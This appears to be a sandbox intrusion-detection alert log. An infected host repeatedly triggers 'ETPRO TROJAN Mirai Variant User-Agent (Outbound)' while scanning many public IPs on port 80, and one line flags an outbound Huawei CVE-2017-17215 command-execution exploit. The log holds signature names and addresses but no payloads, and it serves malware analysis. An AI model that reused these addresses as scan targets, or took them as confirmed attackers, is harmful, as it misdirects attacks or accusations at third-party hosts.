192.168.2.2395.100.70.24736802802839471 05/27/22-12:32:30.210014	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36802	80	192.168.2.23	95.100.70.247
192.168.2.2395.58.244.6440006802839471 05/27/22-12:32:30.316788	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40006	80	192.168.2.23	95.58.244.64
192.168.2.2388.198.151.10550458802839471 05/27/22-12:31:23.849032	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50458	80	192.168.2.23	88.198.151.105
192.168.2.2395.65.82.20149266802839471 05/27/22-12:34:15.312931	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49266	80	192.168.2.23	95.65.82.201
192.168.2.2388.87.122.4440572802839471 05/27/22-12:31:54.832677	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40572	80	192.168.2.23	88.87.122.44
192.168.2.2395.20.119.9339774802839471 05/27/22-12:33:53.002379	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39774	80	192.168.2.23	95.20.119.93
192.168.2.23112.214.91.943860802839471 05/27/22-12:34:06.593929	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43860	80	192.168.2.23	112.214.91.9
192.168.2.23112.124.202.5949088802839471 05/27/22-12:32:30.928386	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49088	80	192.168.2.23	112.124.202.59
192.168.2.2395.154.219.6738350802839471 05/27/22-12:32:36.726942	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38350	80	192.168.2.23	95.154.219.67
192.168.2.2395.100.84.18252118802839471 05/27/22-12:31:38.667115	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52118	80	192.168.2.23	95.100.84.182
192.168.2.2395.235.105.20446940802839471 05/27/22-12:33:12.901640	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46940	80	192.168.2.23	95.235.105.204
192.168.2.23112.178.147.9751130802839471 05/27/22-12:31:28.520517	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51130	80	192.168.2.23	112.178.147.97
192.168.2.2395.100.204.11037574802839471 05/27/22-12:31:00.396025	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	37574	80	192.168.2.23	95.100.204.110
192.168.2.2388.198.137.15253476802839471 05/27/22-12:31:42.335689	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53476	80	192.168.2.23	88.198.137.152
192.168.2.2395.154.221.17751686802839471 05/27/22-12:32:22.567031	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51686	80	192.168.2.23	95.154.221.177
192.168.2.2388.99.84.4244326802839471 05/27/22-12:31:54.754494	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44326	80	192.168.2.23	88.99.84.42
192.168.2.2395.217.82.746910802839471 05/27/22-12:31:19.799558	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46910	80	192.168.2.23	95.217.82.7
192.168.2.23112.164.173.2357754802839471 05/27/22-12:32:02.457344	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57754	80	192.168.2.23	112.164.173.23
192.168.2.23112.169.182.14540522802839471 05/27/22-12:31:28.532451	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40522	80	192.168.2.23	112.169.182.145
192.168.2.2395.211.189.20459478802839471 05/27/22-12:33:00.977962	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59478	80	192.168.2.23	95.211.189.204
192.168.2.23112.171.40.22351266802839471 05/27/22-12:34:26.065722	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51266	80	192.168.2.23	112.171.40.223
192.168.2.2388.98.181.15749770802839471 05/27/22-12:33:01.043025	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49770	80	192.168.2.23	88.98.181.157
192.168.2.2395.101.161.2857428802839471 05/27/22-12:31:33.308821	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57428	80	192.168.2.23	95.101.161.28
192.168.2.2395.58.113.559516802839471 05/27/22-12:32:19.026650	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59516	80	192.168.2.23	95.58.113.5
192.168.2.2388.208.214.8354508802839471 05/27/22-12:33:14.819620	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54508	80	192.168.2.23	88.208.214.83
192.168.2.2395.59.245.2043218802839471 05/27/22-12:32:30.308154	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43218	80	192.168.2.23	95.59.245.20
192.168.2.2388.208.220.547198802839471 05/27/22-12:31:23.868712	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47198	80	192.168.2.23	88.208.220.5
192.168.2.2395.39.140.1534816802839471 05/27/22-12:31:38.557073	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34816	80	192.168.2.23	95.39.140.15
192.168.2.2388.22.247.17554798802839471 05/27/22-12:32:16.218137	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54798	80	192.168.2.23	88.22.247.175
192.168.2.2395.101.80.16635368802839471 05/27/22-12:31:19.815486	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35368	80	192.168.2.23	95.101.80.166
192.168.2.2395.165.255.538992802839471 05/27/22-12:34:00.476246	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38992	80	192.168.2.23	95.165.255.5
192.168.2.2395.101.179.7247718802839471 05/27/22-12:33:45.559487	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47718	80	192.168.2.23	95.101.179.72
192.168.2.2388.31.233.346718802839471 05/27/22-12:31:20.193652	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46718	80	192.168.2.23	88.31.233.3
192.168.2.2395.138.128.7836584802839471 05/27/22-12:31:54.758519	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36584	80	192.168.2.23	95.138.128.78
192.168.2.2395.59.33.16151250802839471 05/27/22-12:32:24.240623	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51250	80	192.168.2.23	95.59.33.161
192.168.2.2388.163.26.19238608802839471 05/27/22-12:32:18.792798	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38608	80	192.168.2.23	88.163.26.192
192.168.2.2388.221.46.13850426802839471 05/27/22-12:31:51.214773	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50426	80	192.168.2.23	88.221.46.138
192.168.2.2395.217.26.9340238802839471 05/27/22-12:32:22.579519	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40238	80	192.168.2.23	95.217.26.93
192.168.2.2395.57.117.8556186802839471 05/27/22-12:31:15.088619	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56186	80	192.168.2.23	95.57.117.85
192.168.2.2395.159.47.2739312802839471 05/27/22-12:31:19.910781	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39312	80	192.168.2.23	95.159.47.27
192.168.2.2388.12.46.21853806802839471 05/27/22-12:31:23.930863	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53806	80	192.168.2.23	88.12.46.218
192.168.2.2395.101.14.20760674802839471 05/27/22-12:33:11.611379	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60674	80	192.168.2.23	95.101.14.207
192.168.2.2388.80.20.16059264802839471 05/27/22-12:31:31.124184	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59264	80	192.168.2.23	88.80.20.160
192.168.2.2388.129.59.5441168802839471 05/27/22-12:31:54.808552	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41168	80	192.168.2.23	88.129.59.54
192.168.2.2395.179.162.8249118802839471 05/27/22-12:32:12.671842	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49118	80	192.168.2.23	95.179.162.82
192.168.2.2395.154.232.18054160802839471 05/27/22-12:31:19.786814	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54160	80	192.168.2.23	95.154.232.180
192.168.2.2395.100.210.11343142802839471 05/27/22-12:31:56.914233	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43142	80	192.168.2.23	95.100.210.113
192.168.2.2388.247.209.7656418802839471 05/27/22-12:32:44.011426	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56418	80	192.168.2.23	88.247.209.76
192.168.2.2395.101.78.21536224802839471 05/27/22-12:32:22.566529	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36224	80	192.168.2.23	95.101.78.215
192.168.2.2395.111.194.23152466802839471 05/27/22-12:31:33.671458	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52466	80	192.168.2.23	95.111.194.231
192.168.2.2388.99.242.25248898802839471 05/27/22-12:32:00.067857	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48898	80	192.168.2.23	88.99.242.252
192.168.2.2395.58.239.15650468802839471 05/27/22-12:32:19.018154	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50468	80	192.168.2.23	95.58.239.156
192.168.2.2395.101.174.1043504802839471 05/27/22-12:33:58.075621	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43504	80	192.168.2.23	95.101.174.10
192.168.2.2388.221.148.4654120802839471 05/27/22-12:31:23.853653	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54120	80	192.168.2.23	88.221.148.46
192.168.2.2395.38.192.9948692802839471 05/27/22-12:31:34.995858	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48692	80	192.168.2.23	95.38.192.99
192.168.2.2395.143.188.16843516802839471 05/27/22-12:31:45.547396	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43516	80	192.168.2.23	95.143.188.168
192.168.2.2388.221.77.1557238802839471 05/27/22-12:33:39.992640	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57238	80	192.168.2.23	88.221.77.15
192.168.2.2388.99.222.19559234802839471 05/27/22-12:31:17.577531	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59234	80	192.168.2.23	88.99.222.195
192.168.2.2395.58.157.17757174802839471 05/27/22-12:31:38.540240	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57174	80	192.168.2.23	95.58.157.177
192.168.2.23112.74.142.3459320802839471 05/27/22-12:31:23.802886	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59320	80	192.168.2.23	112.74.142.34
192.168.2.2395.100.186.17755934802839471 05/27/22-12:31:19.783764	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55934	80	192.168.2.23	95.100.186.177
192.168.2.23112.197.186.6934232802839471 05/27/22-12:34:15.264649	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34232	80	192.168.2.23	112.197.186.69
192.168.2.2388.99.225.19342160802839471 05/27/22-12:31:43.544055	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42160	80	192.168.2.23	88.99.225.193
192.168.2.2388.213.207.446980802839471 05/27/22-12:31:48.561691	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46980	80	192.168.2.23	88.213.207.4
192.168.2.2395.58.167.1339100802839471 05/27/22-12:31:17.554715	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39100	80	192.168.2.23	95.58.167.13
192.168.2.2395.169.212.14050382802839471 05/27/22-12:33:09.361075	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50382	80	192.168.2.23	95.169.212.140
192.168.2.23112.122.156.19160710802839471 05/27/22-12:32:09.446158	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60710	80	192.168.2.23	112.122.156.191
192.168.2.2395.181.216.13439360802839471 05/27/22-12:33:56.676376	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39360	80	192.168.2.23	95.181.216.134
192.168.2.2395.217.39.11039044802839471 05/27/22-12:31:34.961644	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39044	80	192.168.2.23	95.217.39.110
192.168.2.23112.165.103.7553042802839471 05/27/22-12:32:06.956682	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53042	80	192.168.2.23	112.165.103.75
192.168.2.2388.198.210.2041554802839471 05/27/22-12:33:48.061475	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41554	80	192.168.2.23	88.198.210.20
192.168.2.2395.111.247.19134022802839471 05/27/22-12:31:33.249723	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34022	80	192.168.2.23	95.111.247.191
192.168.2.2395.56.134.4155198802839471 05/27/22-12:33:43.132577	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55198	80	192.168.2.23	95.56.134.41
192.168.2.2395.143.218.15158842802839471 05/27/22-12:31:34.920579	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58842	80	192.168.2.23	95.143.218.151
192.168.2.2395.56.25.17758708802839471 05/27/22-12:33:11.671020	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58708	80	192.168.2.23	95.56.25.177
192.168.2.23112.45.117.15235872802839471 05/27/22-12:32:22.616897	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35872	80	192.168.2.23	112.45.117.152
192.168.2.2388.225.240.20647174802839471 05/27/22-12:32:00.123619	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47174	80	192.168.2.23	88.225.240.206
192.168.2.2395.139.131.7156624802839471 05/27/22-12:31:19.900307	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56624	80	192.168.2.23	95.139.131.71
192.168.2.23112.70.237.1542186802839471 05/27/22-12:32:16.418537	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42186	80	192.168.2.23	112.70.237.15
192.168.2.2395.100.48.23837696802839471 05/27/22-12:33:40.977680	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	37696	80	192.168.2.23	95.100.48.238
192.168.2.2395.173.178.449408802839471 05/27/22-12:32:07.017851	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49408	80	192.168.2.23	95.173.178.4
192.168.2.2388.152.159.9645460802839471 05/27/22-12:32:18.787691	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45460	80	192.168.2.23	88.152.159.96
192.168.2.2395.217.143.5041066802839471 05/27/22-12:31:38.463113	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41066	80	192.168.2.23	95.217.143.50
192.168.2.23112.206.140.20648232802839471 05/27/22-12:33:29.276621	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48232	80	192.168.2.23	112.206.140.206
192.168.2.23112.48.170.10346806802839471 05/27/22-12:31:51.437308	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46806	80	192.168.2.23	112.48.170.103
192.168.2.2395.111.251.3158270802839471 05/27/22-12:34:13.924270	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58270	80	192.168.2.23	95.111.251.31
192.168.2.2395.216.138.20456560802839471 05/27/22-12:32:06.997755	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56560	80	192.168.2.23	95.216.138.204
192.168.2.2395.217.64.21642418802839471 05/27/22-12:31:38.463136	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42418	80	192.168.2.23	95.217.64.216
192.168.2.2395.164.219.10052268802839471 05/27/22-12:32:07.060866	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52268	80	192.168.2.23	95.164.219.100
192.168.2.2388.221.139.17341446802839471 05/27/22-12:31:15.018641	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41446	80	192.168.2.23	88.221.139.173
192.168.2.2388.221.111.2735636802839471 05/27/22-12:31:25.170536	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35636	80	192.168.2.23	88.221.111.27
192.168.2.2388.221.196.10042160802839471 05/27/22-12:31:29.023462	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42160	80	192.168.2.23	88.221.196.100
192.168.2.2388.103.173.6754636802839471 05/27/22-12:34:17.807413	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54636	80	192.168.2.23	88.103.173.67
192.168.2.23112.47.1.17334512802839471 05/27/22-12:32:15.868522	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34512	80	192.168.2.23	112.47.1.173
192.168.2.23112.200.243.9341862802839471 05/27/22-12:33:05.511661	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41862	80	192.168.2.23	112.200.243.93
192.168.2.2388.203.6.12952030802839471 05/27/22-12:31:45.486116	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52030	80	192.168.2.23	88.203.6.129
192.168.2.23112.197.186.6934662802839471 05/27/22-12:34:29.593435	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34662	80	192.168.2.23	112.197.186.69
192.168.2.2395.181.161.18833806802839471 05/27/22-12:32:12.680954	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33806	80	192.168.2.23	95.181.161.188
192.168.2.2388.211.83.7245092802839471 05/27/22-12:31:54.800343	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45092	80	192.168.2.23	88.211.83.72
192.168.2.2388.87.4.5151120802839471 05/27/22-12:31:15.092894	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51120	80	192.168.2.23	88.87.4.51
192.168.2.2395.179.180.15238212802839471 05/27/22-12:33:30.964976	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38212	80	192.168.2.23	95.179.180.152
192.168.2.2388.87.26.2551386802839471 05/27/22-12:31:15.092875	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51386	80	192.168.2.23	88.87.26.25
192.168.2.2388.34.44.17258598802839471 05/27/22-12:32:45.075473	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58598	80	192.168.2.23	88.34.44.172
192.168.2.2388.221.111.2735596802839471 05/27/22-12:31:23.848429	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35596	80	192.168.2.23	88.221.111.27
192.168.2.23112.163.5.17945500802839471 05/27/22-12:31:23.584004	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45500	80	192.168.2.23	112.163.5.179
192.168.2.2388.86.215.22060880802839471 05/27/22-12:31:43.521931	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60880	80	192.168.2.23	88.86.215.220
192.168.2.23112.121.174.2733836802839471 05/27/22-12:32:12.885897	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33836	80	192.168.2.23	112.121.174.27
192.168.2.23112.211.189.10935672802839471 05/27/22-12:33:05.551569	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35672	80	192.168.2.23	112.211.189.109
192.168.2.2395.139.246.10660628802839471 05/27/22-12:31:00.389921	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60628	80	192.168.2.23	95.139.246.106
192.168.2.2395.245.178.853938802839471 05/27/22-12:32:18.853740	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53938	80	192.168.2.23	95.245.178.8
192.168.2.23112.211.85.7945736802839471 05/27/22-12:32:52.261918	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45736	80	192.168.2.23	112.211.85.79
192.168.2.2395.226.61.13044442802839471 05/27/22-12:33:05.595447	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44442	80	192.168.2.23	95.226.61.130
192.168.2.23112.196.112.11338078802839471 05/27/22-12:34:26.100254	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38078	80	192.168.2.23	112.196.112.113
192.168.2.2395.216.47.23354886802839471 05/27/22-12:32:06.997849	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54886	80	192.168.2.23	95.216.47.233
192.168.2.2395.213.212.18938108802839471 05/27/22-12:31:06.389031	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38108	80	192.168.2.23	95.213.212.189
192.168.2.23112.213.45.9234744802839471 05/27/22-12:31:23.654056	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34744	80	192.168.2.23	112.213.45.92
192.168.2.2388.255.55.21546638802839471 05/27/22-12:31:48.630707	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46638	80	192.168.2.23	88.255.55.215
192.168.2.2341.0.91.12739528372152835222 05/27/22-12:34:12.220909	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	39528	37215	192.168.2.23	41.0.91.127
192.168.2.2388.216.103.15835942802839471 05/27/22-12:31:42.389093	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35942	80	192.168.2.23	88.216.103.158
192.168.2.2395.131.160.14457636802839471 05/27/22-12:32:36.982308	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57636	80	192.168.2.23	95.131.160.144
192.168.2.23112.35.79.5439488802839471 05/27/22-12:32:12.893316	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39488	80	192.168.2.23	112.35.79.54
192.168.2.2395.57.29.12344802802839471 05/27/22-12:33:01.063137	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44802	80	192.168.2.23	95.57.29.123
192.168.2.2388.250.68.22540434802839471 05/27/22-12:34:17.873487	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40434	80	192.168.2.23	88.250.68.225
192.168.2.2388.109.137.16250830802839471 05/27/22-12:32:53.097961	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50830	80	192.168.2.23	88.109.137.162
192.168.2.2388.221.205.1139676802839471 05/27/22-12:32:22.952163	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39676	80	192.168.2.23	88.221.205.11
192.168.2.23112.172.108.6844012802839471 05/27/22-12:31:26.456649	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44012	80	192.168.2.23	112.172.108.68
192.168.2.2395.101.65.18134938802839471 05/27/22-12:34:15.279681	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34938	80	192.168.2.23	95.101.65.181
192.168.2.23112.74.184.16060202802839471 05/27/22-12:31:46.274302	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60202	80	192.168.2.23	112.74.184.160
192.168.2.2388.24.129.16135668802839471 05/27/22-12:34:17.895514	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35668	80	192.168.2.23	88.24.129.161
192.168.2.2395.129.208.23659430802839471 05/27/22-12:32:22.558579	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59430	80	192.168.2.23	95.129.208.236
192.168.2.23112.14.5.22450654802839471 05/27/22-12:32:06.968249	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50654	80	192.168.2.23	112.14.5.224
192.168.2.23112.213.102.19753180802839471 05/27/22-12:31:40.096566	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53180	80	192.168.2.23	112.213.102.197
192.168.2.23112.197.186.6934428802839471 05/27/22-12:34:21.537072	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34428	80	192.168.2.23	112.197.186.69
192.168.2.2395.151.147.3752382802839471 05/27/22-12:31:33.320284	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52382	80	192.168.2.23	95.151.147.37
192.168.2.2388.225.231.24140972802839471 05/27/22-12:33:30.985507	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40972	80	192.168.2.23	88.225.231.241
192.168.2.23112.72.58.12757136802839471 05/27/22-12:31:00.709407	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57136	80	192.168.2.23	112.72.58.127
192.168.2.2388.203.6.12952022802839471 05/27/22-12:31:42.372374	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52022	80	192.168.2.23	88.203.6.129
192.168.2.2388.221.186.12234042802839471 05/27/22-12:31:43.549751	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34042	80	192.168.2.23	88.221.186.122
192.168.2.2395.77.153.1350944802839471 05/27/22-12:31:34.999503	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50944	80	192.168.2.23	95.77.153.13
192.168.2.2395.217.232.10152404802839471 05/27/22-12:33:43.043686	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52404	80	192.168.2.23	95.217.232.101
192.168.2.2395.249.6.18243248802839471 05/27/22-12:31:19.925251	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43248	80	192.168.2.23	95.249.6.182
192.168.2.23112.135.194.12947528802839471 05/27/22-12:32:27.557736	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47528	80	192.168.2.23	112.135.194.129
192.168.2.2395.140.155.24039534802839471 05/27/22-12:31:11.848254	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39534	80	192.168.2.23	95.140.155.240
192.168.2.2395.67.8.5649576802839471 05/27/22-12:31:54.770414	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49576	80	192.168.2.23	95.67.8.56
192.168.2.2395.163.251.19650388802839471 05/27/22-12:32:24.131657	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50388	80	192.168.2.23	95.163.251.196
192.168.2.2388.225.222.13260712802839471 05/27/22-12:32:44.015755	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60712	80	192.168.2.23	88.225.222.132
192.168.2.2388.99.205.20749030802839471 05/27/22-12:33:00.999487	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49030	80	192.168.2.23	88.99.205.207
192.168.2.2395.214.95.18560942802839471 05/27/22-12:31:45.629413	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60942	80	192.168.2.23	95.214.95.185
192.168.2.2388.203.102.18741940802839471 05/27/22-12:31:31.123524	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41940	80	192.168.2.23	88.203.102.187
192.168.2.2388.109.137.16250882802839471 05/27/22-12:32:56.716771	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50882	80	192.168.2.23	88.109.137.162
192.168.2.2395.9.242.10437384802839471 05/27/22-12:33:09.302194	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	37384	80	192.168.2.23	95.9.242.104
192.168.2.2395.61.204.22037348802839471 05/27/22-12:32:36.837881	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	37348	80	192.168.2.23	95.61.204.220
192.168.2.2395.71.129.22054036802839471 05/27/22-12:33:56.718060	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54036	80	192.168.2.23	95.71.129.220
192.168.2.2388.86.215.22060870802839471 05/27/22-12:31:45.496953	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60870	80	192.168.2.23	88.86.215.220
192.168.2.2395.209.132.11833830802839471 05/27/22-12:33:58.194099	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33830	80	192.168.2.23	95.209.132.118
192.168.2.2388.221.236.2257688802839471 05/27/22-12:32:16.195697	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57688	80	192.168.2.23	88.221.236.22
192.168.2.2395.101.229.3341400802839471 05/27/22-12:31:09.563382	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41400	80	192.168.2.23	95.101.229.33
192.168.2.2388.149.176.15243380802839471 05/27/22-12:32:16.195035	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43380	80	192.168.2.23	88.149.176.152
192.168.2.2395.101.208.13949116802839471 05/27/22-12:34:13.943690	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49116	80	192.168.2.23	95.101.208.139
192.168.2.2395.100.225.19844024802839471 05/27/22-12:31:06.356024	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44024	80	192.168.2.23	95.100.225.198
192.168.2.2395.159.43.11338992802839471 05/27/22-12:32:59.949064	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38992	80	192.168.2.23	95.159.43.113
